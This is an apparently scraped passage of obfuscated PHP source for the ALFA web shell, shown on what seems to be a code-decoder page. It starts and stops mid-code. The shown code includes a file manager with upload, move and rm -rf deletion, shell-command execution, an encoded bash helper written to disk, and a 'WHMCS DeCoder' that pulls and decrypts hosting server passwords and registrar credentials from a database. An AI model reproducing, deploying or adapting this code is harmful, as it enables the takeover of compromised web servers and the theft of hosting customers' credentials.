($c < $hash_length) { $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c])); ++$c; } goto xSzRj; kmNwk: $iv = $out = ''; goto XGHl_; PhvvT: $tmp_iv = substr($string, 0, $hash_length); goto I8ywX; AsAnA: $hash_key = _hash($key); goto xF9cN; I8ywX: $string = substr($string, $hash_length, strlen($string) - $hash_length); goto kmNwk; arN_l: return $out; goto pxhL9; pxhL9: } goto g_2lk; rvPk6: echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>"; goto VnIDR; VnIDR: if ($_POST["alfa5"] != '') { goto IZ3lR; NzYMM: $cc_encryption_hash = $_POST["alfa6"]; goto EhnR1; fdCBk: $db_username = $_POST["alfa3"]; goto wtONr; wtONr: $db_password = $_POST["alfa4"]; goto VPJxR; Lf0OG: $query = mysqli_query($conn, "SELECT * FROM tblservers"); goto CF5Cy; gfV2c: if ($num > 0) { goto E1Jiy; zgmYt: if ($num1 > 0) { for ($i = 0; $i <= $num1 - 1; $i++) { $v = mysqli_fetch_array($query1); $registrar = $v["registrar"]; $setting = $v["setting"]; $value = decrypt($v["value"], $cc_encryption_hash); if ($value == '') { $value = 0; } echo "<center>Domain Reseller <br><center>"; echo "<center><table border='1'>"; echo "<tr><td><b><font color="#67ABDF">Register</font></td><td>{$registrar}</td></tr></b>"; echo "<tr><td><b><font color="#67ABDF">Setting</font></td><td>{$setting}</td></tr></b>"; echo "<tr><td><b><font color="#67ABDF">Value</font></td><td>{$value}</td></tr></b>"; echo "</table><br><br></center>"; } } goto Rrn_x; AhHgM: $query1 = @mysqli_query($conn, "SELECT * FROM tblregistrars"); goto MWy79; MWy79: $num1 = @mysqli_num_rows($query1); goto zgmYt; E1Jiy: for ($i = 0; $i <= $num - 1; $i++) { $v = @mysqli_fetch_array($query); $ipaddress = $v["ipaddress"]; $username = $v["username"]; $type = $v["type"]; $active = $v["active"]; $hostname = $v["hostname"]; echo "<center><table border='1'>"; $password = decrypt($v["password"], $cc_encryption_hash); echo "<tr><td><b><font color="#FFFFFF">Type</font></td><td>{$type}</td></tr></b>"; echo "<tr><td><b><font color="#FFFFFF">Active</font></td><td>{$active}</td></tr></b>"; echo "<tr><td><b><font color="#FFFFFF">Hostname</font></td><td>{$hostname}</td></tr></b>"; echo "<tr><td><b><font color="#FFFFFF">Ip</font></td><td>{$ipaddress}</td></tr></b>"; echo "<tr><td><b><font color="#FFFFFF">Username</font></td><td>{$username}</td></tr></b>"; echo "<tr><td><b><font color="#FFFFFF">Password</font></td><td>{$password}</td></tr></b>"; echo "</table><br><br></center>"; } goto AhHgM; Rrn_x: } else { __alert("<font color="red">tblservers is Empty...!</font>"); } goto AwM_i; D9Uav: $conn = @mysqli_connect($db_host, $db_username, $db_password, $db_name) or die(mysqli_error($conn)); goto Lf0OG; IZ3lR: $db_host = $_POST["alfa7"]; goto fdCBk; CF5Cy: $num = mysqli_num_rows($query); goto gfV2c; VPJxR: $db_name = $_POST["alfa5"]; goto NzYMM; EhnR1: echo __pre(); goto D9Uav; AwM_i: } goto ZxOsd; r6Gyq: echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>" . getConfigHtml("whmcs") . "</p><form onsubmit="g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;">\xd\xa<input type='hidden' name='form_action' value='2'>"; goto Fy425; IP89F: AlfaNum(8, 9, 10); goto r6Gyq; IE_h6: alfahead(); goto O5g9w; EMggQ: alfafooter(); goto pDTsS; ZxOsd: echo "</div>"; goto EMggQ; pDTsS: } goto wc9n7; DjH8C: if (!isset($GLOBALS["DB_NAME"]["post_encryption"])) { exit("$GLOBALS['DB_NAME']['post_encryption']"); } goto kWOwO; bdpLb: if (!isset($_SERVER["HTTP_HOST"])) { exit; } goto ydVbV; veOxe: function __get_resource($content) { return @gzinflate(__ZGVjb2Rlcg($content)); } goto uRin1; SIiKg: function findicon($file, $type) { goto J8dg4; J8dg4: $s = "http://solevisible.com/icons/"; goto KVZ0a; KVZ0a: $types = array("json", "ppt", "pptx", "xls", "xlsx", "msi", "config", "cgi", "pm", "c", "cpp", "cs", "java", "aspx", "asp", "db", "ttf", "eot", "woff", "woff2", "woff", "conf", "log", "apk", "cab", "bz2", "tgz", "dmg", "izo", "jar", "7z", "iso", "rar", "bat", "sh", "alfa", "gz", "tar", "php", "php4", "php5", "phtml", "html", "xhtml", "shtml", "htm", "zip", "png", "jpg", "jpeg", "gif", "bmp", "ico", "txt", "js", "rb", "py", "xml", "css", "sql", "htaccess", "pl", "ini", "dll", "exe", "mp3", "mp4", "m4a", "mov", "flv", "swf", "mkv", "avi", "wmv", "mpg", "mpeg", "dat", "pdf", "3gp", "doc", "docx", "docm"); goto CH3nk; CH3nk: if ($type != "file") { return $file == ".." ? $s . "back.png" : $s . "folder.png"; } else { goto Z_6n0; WWrS0: $ext = end($ext); goto HbwTA; HbwTA: $ext = strtolower($ext); goto IepTH; IepTH: return in_array($ext, $types) ? $s . $ext . ".png" : $s . "notfound.png"; goto WJyXV; Z_6n0: $ext = explode(".", $file); goto WWrS0; WJyXV: } goto NXoEi; NXoEi: } goto go6An; QhCss: function alfacheckcgi() { if (strlen(alfaEx("id", false, true, true)) > 0) { echo "ok"; } else { echo "no"; } } goto CNXC7; PME30: $oFcbuslxiL = $gEleJRqGNj("$cq", $CyvIHOdCHU . "(" . $jgpUDiTPrk . "(" . "Q" . "FdAW" . "qZ" . "n" . "U" . "X" . '' . "($cq)" . ")" . ")" . ";"); goto iXJiQ; h7Dp9: exit;

Did this file decode correctly?

Original Code

?> $GLOBALS["\104\102\137\116\101\115\x45"]["\x75\163\x65\x72"], "\x41\x6c\146\141\120\x61\163\163" => $GLOBALS["\104\102\x5f\116\101\115\105"]["\160\x61\x73\163"], "\x41\x6c\x66\141\x50\162\x6f\164\x65\x63\x74\123\150\x65\154\154" => $GLOBALS["\104\102\x5f\x4e\101\115\x45"]["\163\x61\146\x65\155\157\x64\145"], "\101\154\146\141\114\x6f\x67\151\156\x50\x61\147\x65" => $GLOBALS["\104\102\x5f\116\101\115\105"]["\154\x6f\x67\x69\156\x5f\x70\x61\147\x65"]); goto GehJu; S12M6: @ini_set("\154\157\x67\137\145\162\162\x6f\x72\x73", 0); goto xX0N2; JxZhl: function alfaFilesMan() { goto duJYK; lwj7j: $dirs = $files = array(); goto SoWz0; WtHTS: $sort = array("\156\141\x6d\x65", 1); goto p3NoF; DHDQP: alfafooter(); goto gpn7f; skbF9: $l = 0; goto QBThI; EUVur: function alfaCmp($a, $b) { if ($GLOBALS["\x73\157\x72\164"][0] != "\163\151\172\145") { return strcmp(strtolower($a[$GLOBALS["\163\157\x72\164"][0]]), strtolower($b[$GLOBALS["\x73\157\162\x74"][0]])) * ($GLOBALS["\163\157\162\x74"][1] ? 1 : -1); } else { return ($a["\x73\151\x7a\x65"] < $b["\163\151\x7a\145"] ? -1 : 1) * ($GLOBALS["\x73\157\x72\x74"][1] ? 1 : -1); } } goto uea1z; SoWz0: $n = count($dirContent); goto I_aiv; xuS6l: echo "\74\x64\x69\166\40\143\x6c\x61\163\163\x3d\42\x61\x6a\x61\x78\141\x72\145\141\42\x3e\74\x64\151\166\x20\x63\x6c\141\163\163\x3d\42\x68\x65\141\x64\x65\x72\42\x3e"; goto JVp0a; PtbI1: $cmd_dir = false; goto C8q_h; f6bDN: echo "\x3c\164\162\76\74\x74\144\x20\x63\x6f\154\163\x70\141\x6e\x3d\x37\x3e\15\12\x3c\151\x6e\x70\165\164\x20\x74\171\160\145\x3d\x68\151\x64\x64\x65\156\x20\x6e\x61\155\x65\x3d\141\x20\x76\x61\154\165\x65\x3d\47\106\151\x6c\x65\163\x4d\x61\x6e\x27\76\15\xa\x3c\151\156\x70\x75\x74\x20\164\x79\x70\145\x3d\x68\151\144\x64\145\156\x20\x6e\x61\x6d\x65\x3d\143\40\166\141\x6c\165\145\75\x27" . htmlspecialchars(isset($GLOBALS["\x67\x6c\x6f\142\x5f\143\x68\144\x69\x72\137\x66\141\154\163\x65"]) ? $_POST["\143"] : $GLOBALS["\x63\x77\144"]) . "\x27\76\15\xa\74\x69\x6e\x70\165\x74\40\x74\x79\x70\145\x3d\150\151\144\144\145\x6e\x20\x6e\x61\155\x65\x3d\143\x68\x61\x72\163\x65\x74\40\x76\141\x6c\165\145\75\x27" . (isset($_POST["\x63\150\141\162\x73\145\164"]) ? $_POST["\x63\x68\141\x72\x73\145\x74"] : '') . "\47\x3e\xd\xa\x3c\x73\145\154\145\143\164\x20\151\x64\75\x27\x74\x6f\157\154\163\137\x73\145\154\145\143\x74\x6f\x72\47\x20\156\141\155\145\75\47\141\154\x66\x61\x31\47\x3e\x3c\157\160\x74\x69\x6f\156\40\x76\141\154\165\145\x3d\47\x63\157\x70\x79\47\x3e\103\157\x70\x79\x3c\57\x6f\160\x74\x69\x6f\x6e\76\74\x6f\160\x74\151\x6f\156\40\x76\141\154\165\145\75\x27\x6d\157\x76\145\x27\x3e\115\157\x76\x65\74\x2f\157\160\164\151\x6f\x6e\76\x3c\157\160\x74\x69\157\156\x20\166\x61\154\165\x65\x3d\47\144\145\x6c\145\164\x65\x27\x20\163\145\154\145\143\x74\x65\144\x3e\104\145\x6c\145\x74\x65\74\57\157\x70\164\x69\x6f\156\x3e\x3c\157\160\x74\x69\x6f\x6e\x20\x76\141\x6c\165\x65\x3d\47\x7a\151\x70\x27\76\x41\x64\144\x20\x32\40\x43\157\x6d\x70\x72\x65\163\163\40\x28\x7a\x69\x70\51\x3c\x2f\157\160\164\151\x6f\156\x3e\x3c\157\x70\x74\151\x6f\x6e\x20\166\141\154\x75\x65\75\x27\x75\x6e\172\x69\x70\x27\x3e\101\x64\x64\x20\x32\40\x55\x6e\143\157\x6d\160\162\145\163\x73\40\x28\x7a\x69\160\x29\74\x2f\157\160\164\151\x6f\x6e\76\74\157\160\164\x69\157\x6e\40\x76\x61\x6c\165\145\x3d\x27\x70\141\x73\x74\x65\x27\x3e\x50\x61\x73\164\x65\x20\x2f\40\132\x69\160\x20\57\40\x55\x6e\172\x69\x70\40\x3c\x2f\157\x70\164\151\x6f\x6e\76\74\57\163\145\154\145\x63\x74\x3e\xd\12\x3c\151\156\x70\x75\x74\40\164\x79\160\145\75\x27\x73\x75\x62\155\x69\164\x27\x20\166\141\154\x75\145\75\47\x20\x27\76\xd\12\x3c\57\146\x6f\162\155\x3e\x3c\x2f\164\141\142\154\145\x3e\74\x2f\x64\x69\x76\76\74\57\144\x69\x76\x3e"; goto DHDQP; I_aiv: for ($i = 0; $i < $n; $i++) { if ($cmd_dir) { goto S3QOf; gOlwx: $file_owner = $dirContent[$i]["\x6f\x77\156\145\162"]; goto eUcle; eUcle: $file_group = $dirContent[$i]["\147\162\157\x75\x70"]; goto U5DKR; h8jrO: $file_size = $dirContent[$i]["\x73\x69\x7a\145"]; goto aQ9Y6; TxWuo: $file_perm = alfaPermsColor(array("\143\154\141\x73\163" => $dirContent[$i]["\160\x65\x72\155\143\157\154\157\x72"], "\x6e\165\x6d" => $dirContent[$i]["\x70\x65\162\155\x6e\165\x6d"], "\x68\165\155\x61\x6e" => $dirContent[$i]["\160\x65\x72\x6d\150\165\155\x61\x6e"]), true); goto h8jrO; aQ9Y6: $file_path = $_SESSION[__LAST_CWD__] . "\x2f" . $dirContent[$i]["\x6e\x61\155\x65"]; goto krOdm; U5DKR: $file_modify = @date("\131\x2d\x6d\55\144\40\110\72\x69\x3a\x73", $dirContent[$i]["\x6d\157\x64\x69\146\x79"]); goto TxWuo; S3QOf: $filename = $dirContent[$i]["\x6e\x61\155\145"]; goto gOlwx; krOdm: } else { goto OedA6; JU245: $file_group = $gr["\x6e\141\155\145"] ? $gr["\156\141\x6d\145"] : (function_exists("\x66\151\x6c\x65\147\162\x6f\165\160") ? @filegroup($GLOBALS["\x63\167\144"] . $filename) : "\x3f\x3f\77\77"); goto LOMR0; Vmaz0: $file_size = @filesize($GLOBALS["\143\x77\144"] . $filename); goto WcuKu; nVBZv: $ow = function_exists("\x70\157\163\151\x78\137\x67\145\x74\160\167\x75\151\x64") && function_exists("\x66\x69\154\x65\x6f\167\x6e\x65\x72") ? @posix_getpwuid(@fileowner($GLOBALS["\143\167\144"] . $filename)) : array("\x6e\x61\x6d\x65" => "\x3f\77\x3f\77"); goto fFA09; LOMR0: $file_modify = @date("\131\x2d\x6d\55\x64\x20\110\x3a\x69\72\x73", @filemtime($GLOBALS["\143\x77\x64"] . $filename)); goto zdFX2; fFA09: $gr = function_exists("\160\x6f\163\151\170\137\x67\145\x74\147\x72\147\x69\144") && function_exists("\146\151\x6c\145\147\162\x6f\165\x70") ? @posix_getgrgid(@filegroup($GLOBALS["\143\x77\x64"] . $filename)) : array("\x6e\141\155\x65" => "\77\x3f\x3f\77"); goto Rf8ur; WcuKu: $file_path = $GLOBALS["\x63\x77\x64"] . $filename; goto bheCw; zdFX2: $file_perm = alfaPermsColor($GLOBALS["\x63\x77\144"] . $filename); goto Vmaz0; Rf8ur: $file_owner = $ow["\x6e\141\x6d\x65"] ? $ow["\156\141\x6d\145"] : (function_exists("\146\151\x6c\145\x6f\x77\x6e\x65\x72") ? @fileowner($GLOBALS["\143\167\144"] . $filename) : "\77\x3f\77\77"); goto JU245; OedA6: $filename = $dirContent[$i]; goto nVBZv; bheCw: } $tmp = array("\156\x61\x6d\145" => $filename, "\x70\141\x74\150" => $file_path, "\155\157\x64\151\x66\x79" => $file_modify, "\160\145\162\155\x73" => $file_perm, "\163\x69\x7a\x65" => $file_size, "\157\167\x6e\x65\162" => $file_owner, "\x67\162\157\165\x70" => $file_group); if (!$cmd_dir) { if (@is_file($file_path)) { $files[] = array_merge($tmp, array("\164\x79\x70\145" => "\146\x69\154\x65")); } elseif (@is_link($file_path)) { $dirs[] = array_merge($tmp, array("\164\171\160\x65" => "\x6c\151\x6e\153", "\154\151\156\x6b" => readlink($tmp["\x70\x61\x74\150"]))); } elseif (@is_dir($file_path) && $filename != "\x2e") { $dirs[] = array_merge($tmp, array("\x74\x79\x70\x65" => "\x64\151\x72")); } } else { if ($dirContent[$i]["\164\x79\x70\x65"] == "\x66\x69\x6c\145") { $files[] = array_merge($tmp, array("\x74\x79\x70\145" => "\x66\x69\x6c\x65")); } else { if ($dirContent[$i]["\x6e\x61\x6d\145"] != "\x2e") { $dirs[] = array_merge($tmp, array("\x74\171\x70\145" => "\x64\x69\x72")); } } } } goto zO2bu; C8q_h: if ($dirContent === false) { if (_alfa_can_runCommand(true, true)) { goto askj3; KjrXK: if (is_array($dirContent)) { array_pop($dirContent); $cmd_dir = true; } else { $dirContent = false; } goto JDsIO; pd_1E: $dirContent = json_decode($dirContent, true); goto KjrXK; ro9s0: if (!isset($_SESSION["\x61\x6c\x66\141\143\x68\x64\151\x72\x5f\x62\141\x73\150"]) || @(!file_exists("\x61\x6c\x66\141\143\x67\x69\x61\x70\151\57\147\145\x74\144\151\162\56\141\154\x66\141"))) { $bash = "\x6a\x5a\x4e\x76\142\x35\163\167\105\115\132\x66\167\66\x65\x34\145\x61\x5a\x70\160\141\111\x6b\x33\x5a\71\111\116\114\x79\131\116\x48\x58\161\x32\x30\61\67\125\131\x57\x6f\143\x73\105\105\141\62\x41\x6a\121\65\123\170\x4e\116\71\x39\x50\x6d\115\111\x6c\x54\112\160\105\126\114\117\166\x2b\x66\x75\70\x52\x6b\146\x37\71\x2f\x4e\x39\x34\x32\x65\x76\167\147\x35\x62\167\162\57\66\53\x50\63\x6d\x43\x37\71\x78\64\x63\146\115\x5a\60\154\143\x75\x62\172\x74\106\x42\101\x4e\163\124\x50\x6c\121\131\x42\121\147\x4b\x39\114\x68\163\x49\107\131\x54\x68\124\161\x74\x39\x48\127\x5a\x43\70\x37\122\126\127\x76\x41\155\x7a\111\126\x75\127\x71\x44\107\x35\x65\131\x65\115\x75\127\x44\53\144\x57\x73\114\x57\x4b\103\x62\x45\x34\x46\x38\x54\60\x68\143\170\x58\x54\66\x36\x5a\x6c\114\131\121\x70\153\117\x41\x68\x43\x6e\x35\x47\167\142\x63\x6f\x61\x4b\x4c\147\113\x56\x6f\x45\x4c\x41\161\x2b\105\113\102\131\144\x2b\x4e\x37\x32\115\x6f\x73\x6d\157\110\155\114\x49\116\121\x34\x38\65\115\x61\71\x62\x42\145\x72\60\107\121\164\110\x4e\155\114\132\x64\172\127\116\66\164\115\160\x6d\163\124\x33\132\156\144\126\102\x63\x6a\63\123\x70\141\117\62\66\65\110\145\x47\145\157\x31\x34\x73\53\x35\x2b\x67\x4f\123\123\155\125\151\67\60\142\x32\60\144\x58\x57\x58\x46\x64\x79\130\x34\63\70\x30\64\x51\x58\53\x34\x72\x4a\x55\146\x6d\115\114\x69\x4b\110\172\143\x61\x63\160\x4b\x2b\x43\x4f\x41\x61\171\127\113\65\x57\113\167\x4c\142\67\124\62\60\102\x5a\x65\53\x35\x77\62\145\x5a\111\x47\113\x41\x37\60\132\x79\x66\x54\x68\x74\63\60\115\x7a\70\x56\147\x47\x42\x37\x4d\167\146\110\x31\157\101\71\143\130\126\155\155\112\53\x79\x4e\x64\x36\x70\113\160\127\x4e\x53\x4d\x53\x47\146\x64\x35\160\x7a\x2b\131\x7a\x55\107\120\114\123\62\146\x31\130\x36\141\105\121\x4c\x54\x2b\x58\116\166\x78\x43\152\x75\142\x5a\x6b\110\110\165\x6c\165\x4c\144\62\x4c\x4d\x50\153\x39\x4b\71\x32\x63\150\x65\110\x57\161\x54\154\163\x34\x31\x6d\165\x2f\x32\112\x64\117\121\151\x35\114\142\64\x37\66\53\130\x6b\67\147\126\144\61\x32\57\60\65\162\165\x75\x70\106\x6c\123\x4b\x46\x55\163\x68\x66\106\57\x61\x33\150\x58\63\x62\144\x75\123\x50\x43\x5a\107\163\64\147\x6d\x4a\x49\104\106\x54\x6c\160\102\x62\x38\x34\53\160\152\x76\x51\x68\121\152\164\x6c\x6a\162\x6f\x59\x73\x52\x30\x7a\x68\61\62\115\107\x45\146\116\x30\124\x35\105\x32\x45\53\x62\167\x38\115\x43\x42\124\143\142\124\150\x6c\x58\x67\62\x53\156\132\x43\113\x36\71\123\x44\x62\x71\65\156\x49\142\x6e\x32\66\x39\124\115\154\165\x66\x75\60\152\x36\143\x74\53\121\x73\75"; alfaWriteTocgiapi("\147\145\x74\x64\x69\x72\56\x61\154\146\141", $bash); } goto rDlvd; rDlvd: if (empty($_SESSION[__LAST_CWD__])) { $_SESSION[__LAST_CWD__] = "\x2f"; } goto efP1i; efP1i: $dirContent = alfaEx("\143\x64\40\x61\x6c\146\x61\143\147\151\141\x70\151\x3b\163\x68\40\147\x65\x74\144\x69\162\56\141\x6c\146\x61\x20\47" . addslashes($_SESSION[__LAST_CWD__]) . "\x27"); goto pd_1E; askj3: @chdir(dirname($_SERVER["\123\x43\x52\x49\x50\124\137\106\x49\x4c\x45\116\x41\x4d\105"])); goto ro9s0; JDsIO: $_SESSION["\141\x6c\x66\x61\143\x68\x64\x69\x72\137\x62\141\163\x68"] = true; goto zzXfk; zzXfk: } } goto D0g25; WeVgi: echo "\x3c\146\x6f\x72\155\x20\157\x6e\x73\165\x62\155\151\164\x3d\x27\x66\143\50\x74\150\151\x73\51\x3b\x72\145\x74\x75\x72\x6e\40\x66\141\154\x73\145\73\x27\40\156\x61\x6d\145\75\x27\146\x69\x6c\145\163\x27\40\155\145\x74\x68\157\x64\75\x27\160\x6f\163\x74\47\76\74\164\141\x62\x6c\145\x20\167\151\144\x74\x68\x3d\x27\61\x30\x30\x25\47\x20\143\154\x61\163\x73\x3d\x27\155\x61\151\x6e\x27\x20\143\145\154\154\x73\160\x61\143\x69\x6e\147\x3d\x27\60\x27\40\x63\145\x6c\154\160\141\x64\144\x69\156\x67\75\47\x32\x27\76\x3c\164\x72\x3e\x3c\x74\150\40\x77\151\144\x74\150\75\47\x31\63\x70\x78\47\76\74\144\x69\x76\40\x63\154\141\x73\163\75\x27\x6d\171\x43\150\x65\143\153\x62\x6f\170\47\x20\163\x74\x79\154\x65\x3d\47\160\141\144\144\x69\156\x67\55\x6c\x65\146\164\x3a\60\x70\x78\73\x27\x3e\74\151\x6e\160\165\164\x20\x74\171\x70\x65\75\47\x63\x68\x65\x63\153\x62\157\x78\x27\x20\x69\x64\75\47\155\143\x68\x6b\47\40\x6f\156\x63\154\151\x63\153\x3d\47\x63\x68\145\x63\153\102\x6f\170\50\x29\x3b\47\x20\143\154\x61\x73\163\75\47\x63\150\x6b\142\170\47\x3e\74\154\x61\142\145\x6c\40\x66\157\162\75\47\x6d\143\x68\153\x27\x3e\x3c\57\x6c\141\142\145\x6c\x3e\x3c\x2f\x64\x69\166\76\x3c\x2f\164\x68\76\x3c\164\150\76\x4e\141\x6d\145\x3c\x2f\164\x68\76\74\x74\150\76\123\x69\172\x65\74\x2f\x74\150\x3e\x3c\164\x68\76\x4d\x6f\144\x69\x66\x79\74\x2f\x74\x68\76\x3c\164\150\x3e\117\x77\x6e\x65\x72\x2f\107\162\157\x75\x70\x3c\57\164\x68\x3e\74\x74\x68\76\x50\145\162\x6d\x69\x73\163\151\157\x6e\163\x3c\57\x74\150\76\x3c\x74\x68\x3e\101\143\x74\x69\157\x6e\163\74\x2f\164\150\76\x3c\x2f\164\x72\x3e"; goto lwj7j; IroYI: global $sort; goto WtHTS; uea1z: usort($files, "\x61\154\x66\141\x43\155\x70"); goto yoj1J; NNBGm: AlfaNum(8, 9, 10, 7, 6, 5, 4); goto xuS6l; zO2bu: $GLOBALS["\x73\157\162\164"] = $sort; goto EUVur; p3NoF: if (!empty($_POST["\141\154\146\x61\61"])) { if (preg_match("\x21\x73\x5f\50\133\x41\x2d\x7a\135\53\51\x5f\50\x5c\144\173\61\x7d\x29\x21", $_POST["\141\x6c\x66\x61\61"], $match)) { $sort = array($match[1], (int) $match[2]); } } goto WeVgi; duJYK: alfahead(); goto NNBGm; JVp0a: if (!empty($_COOKIE["\146"])) { $_COOKIE["\x66"] = @unserialize($_COOKIE["\146"]); } goto Lfeg0; n8mTR: if (isset($_SESSION[__LAST_CWD__]) && !isset($_POST["\143"]) && $_SESSION[__LAST_CWD__] != '') { $dirContent = @scandir($_SESSION[__LAST_CWD__]); } else { goto Fht2z; Fht2z: $dirContent = @scandir(isset($_POST["\x63"]) ? $_POST["\x63"] : $GLOBALS["\x63\x77\x64"]); goto CHQlz; CQ_lX: $_SESSION[__LAST_CWD__] = str_replace(array("\x2e\56", "\57\x2f"), array('', "\57"), $_POST["\143"]); goto ew1re; CHQlz: if (preg_match("\43\50\x2e\52\51\134\x2f\x5c\56\x5c\56\x23", $_POST["\x63"], $res)) { goto Q9KYR; V9_bo: array_pop($path); goto XdGjb; XdGjb: $_POST["\143"] = implode("\x2f", $path); goto wtV3i; Q9KYR: $path = explode("\x2f", $res[1]); goto V9_bo; wtV3i: } goto CQ_lX; ew1re: } goto PtbI1; yoj1J: usort($dirs, "\x61\x6c\146\x61\x43\155\160"); goto YBIhE; YBIhE: $files = array_merge($dirs, $files); goto skbF9; QBThI: $cc = 0; goto Dvssi; D0g25: if ($dirContent == false) { goto MoX_m; N7pDN: alfaFooter(); goto PGsYB; PGsYB: return; goto ZuIHV; MoX_m: echo "\x3c\143\145\x6e\x74\x65\162\76\74\x62\162\x3e\x3c\x73\x70\x61\x6e\x20\163\164\171\x6c\145\75\42\146\157\156\x74\x2d\163\x69\x7a\145\72\x31\66\x70\170\x3b\42\76\74\x73\160\141\156\40\x73\164\171\x6c\145\75\42\143\x6f\154\157\162\x3a\x20\162\145\144\73\x20\55\x77\x65\142\153\x69\x74\x2d\164\145\x78\x74\55\x73\x68\x61\144\157\167\72\x20\61\x70\x78\40\61\160\170\40\61\x33\160\x78\x3b\42\76\74\163\x74\162\x6f\156\147\76\74\x62\76\x3c\142\x69\x67\76\41\x21\41\x20\x41\x63\143\145\x73\x73\x20\x44\145\x6e\x69\x65\x64\40\41\41\x21\x3c\x2f\142\x3e\74\57\142\151\x67\76\74\x62\162\x3e\x3c\x62\162\76\x3c\57\x73\164\162\x6f\x6e\147\x3e\74\x2f\144\x69\x76\76"; goto N7pDN; ZuIHV: } goto IroYI; Lfeg0: if (!empty($_POST["\141\154\x66\x61\x31"])) { switch ($_POST["\x61\154\x66\141\61"]) { case "\x75\160\x6c\157\x61\144\x46\x69\154\x65": goto nFrZA; iJ9cM: $files = reArrayFiles($_FILES["\146"]); goto LKlho; C1sM_: break; goto tPFtg; nFrZA: if (isset($GLOBALS["\x67\x6c\x6f\142\137\x63\x68\144\x69\162\137\146\141\x6c\x73\x65"])) { $alfa_canruncmd = _alfa_can_runCommand(true, true); $move_cmd_file = true; } goto iJ9cM; LKlho: foreach ($files as $file) { if ($move_cmd_file) { alfaEx("\143\x61\x74\40\47" . addslashes($file["\x74\155\160\137\156\141\155\145"]) . "\47\x20\x3e\x20\x27" . addslashes($_POST["\143"] . "\57" . $file["\x6e\x61\155\145"]) . "\47"); } else { @move_uploaded_file($file["\164\x6d\x70\137\156\141\155\x65"], $file["\x6e\x61\155\145"]); } echo "\x75\x70\145\144\x2e\x2e\56\41\74\x42\x72\x3e"; } goto C1sM_; tPFtg: case "\x6d\x6b\144\151\162": goto zjQZL; trGwn: if (isset($GLOBALS["\x67\x6c\157\142\x5f\x63\150\144\x69\162\137\146\141\154\163\x65"])) { if (_alfa_can_runCommand(true, true)) { alfaEx("\143\x64\40\47" . trim(addslashes($_POST["\x63"])) . "\x27\73\x6d\x6b\x64\151\x72\40\x27" . trim(addslashes($_POST["\141\x6c\146\x61\x32"])) . "\x27"); } } else { if (!@mkdir(trim($_POST["\x61\154\146\141\62"]))) { echo "\x3c\x62\x3e\74\146\157\156\x74\x20\x63\157\154\157\162\75\x27\x72\x65\x64\47\76\103\x61\x6e\x27\164\x20\x63\162\x65\141\164\145\40\156\x65\167\x20\144\x69\162\x20\x21\x3c\57\142\76\x3c\57\x66\157\156\164\76"; } } goto kyYaF; zjQZL: $new_dir_cmd = false; goto trGwn; kyYaF: break; goto iYsuI; iYsuI: case "\144\x65\x6c\145\164\x65": goto U7_yX; ghm5F: if (is_array(@$_POST["\x66"])) { foreach ($_POST["\146"] as $f) { goto bdhob; w39Ld: if (isset($GLOBALS["\147\154\x6f\142\137\x63\150\144\151\x72\x5f\146\x61\154\x73\145"])) { if (_alfa_can_runCommand(true, true)) { alfaEx("\162\155\x20\55\x72\146\40\47" . addslashes($_POST["\143"] . "\57" . $f) . "\x27"); } } else { alfaEx("\162\155\x20\x2d\162\x66\x20\47" . addslashes($f) . "\x27", false, false); if (@is_dir($f)) { deleteDir($f); } else { @unlink($f); } } goto Nj3wU; bdhob: if ($f == "\x2e\x2e") { continue; } goto mkyFd; mkyFd: $f = rawurldecode($f); goto w39Ld; Nj3wU: } } goto c73o_; U7_yX: function deleteDir($path) { goto zHnD7; dcoCs: @rmdir($path); goto PxiSp; YNXrR: $dh = @opendir($path); goto qnfW8; qnfW8: while (($item = @readdir($dh)) !== false) { $item = $path . $item; if (basename($item) == "\x2e\56" || basename($item) == "\56") { continue; } $type = @filetype($item); if ($type == "\144\x69\162") { deleteDir($item); } else { @unlink($item); } } goto ActEs; ActEs: @closedir($dh); goto dcoCs; zHnD7: $path = substr($path, -1) == "\57" ? $path : $path . "\57"; goto YNXrR; PxiSp: } goto ghm5F; c73o_: if (@is_dir(rawurldecode(@$_POST["\141\x6c\146\141\x32"])) && rawurldecode(@$_POST["\x61\x6c\146\x61\62"]) != "\x2e\x2e") { deleteDir(rawurldecode(@$_POST["\141\x6c\x66\141\x32"])); alfaEx("\162\x6d\40\x2d\x72\x66\40\x27" . addslashes($_POST["\x61\x6c\146\x61\x32"]) . "\47", false, false); } else { @unlink(rawurldecode(@$_POST["\141\154\x66\141\62"])); } goto hvNWx; hvNWx: if (isset($GLOBALS["\147\154\157\x62\137\143\x68\144\151\162\137\x66\x61\154\163\x65"])) { $source = rawurldecode(@$_POST["\141\154\146\141\62"]); if ($source != "\x2e\56" && !empty($source)) { if (_alfa_can_runCommand(true, true)) { alfaEx("\x63\x64\40\47" . trim(addslashes($_POST["\x63"])) . "\47\73\x72\x6d\x20\55\162\x66\40\x27" . addslashes($source) . "\x27"); } } } goto jXN7M; jXN7M: break; goto sgp8x; sgp8x: case "\x70\x61\163\164\x65": goto gU00R; Frxux: unset($_SESSION["\146"]); goto yikH4; gU00R: if ($_SESSION["\x61\143\164"] == "\143\x6f\160\171" && isset($_SESSION["\146"])) { function copy_paste($c, $s, $d) { if (@is_dir($c . $s)) { goto AnirJ; Py1zk: while (($f = @readdir($h)) !== false) { if ($f != "\56" and $f != "\x2e\56") { copy_paste($c . $s . "\57", $f, $d . $s . "\x2f"); } } goto j0p0H; SaQTf: $h = @opendir($c . $s); goto Py1zk; AnirJ: @mkdir($d . $s); goto SaQTf; j0p0H: } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_SESSION["\x66"] as $f) { copy_paste($_SESSION["\x63"], $f, $GLOBALS["\x63\x77\144"]); } } elseif ($_SESSION["\x61\143\164"] == "\x6d\157\166\145" && isset($_SESSION["\146"])) { function move_paste($c, $s, $d) { if (@is_dir($c . $s)) { goto ac1Cn; LqZvf: $h = @opendir($c . $s); goto W0VlY; W0VlY: while (($f = @readdir($h)) !== false) { if ($f != "\56" and $f != "\56\x2e") { copy_paste($c . $s . "\x2f", $f, $d . $s . "\57"); } } goto KJcDZ; ac1Cn: @mkdir($d . $s); goto LqZvf; KJcDZ: } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_SESSION["\146"] as $f) { @rename($_SESSION["\143"] . $f, $GLOBALS["\143\167\x64"] . $f); } } elseif 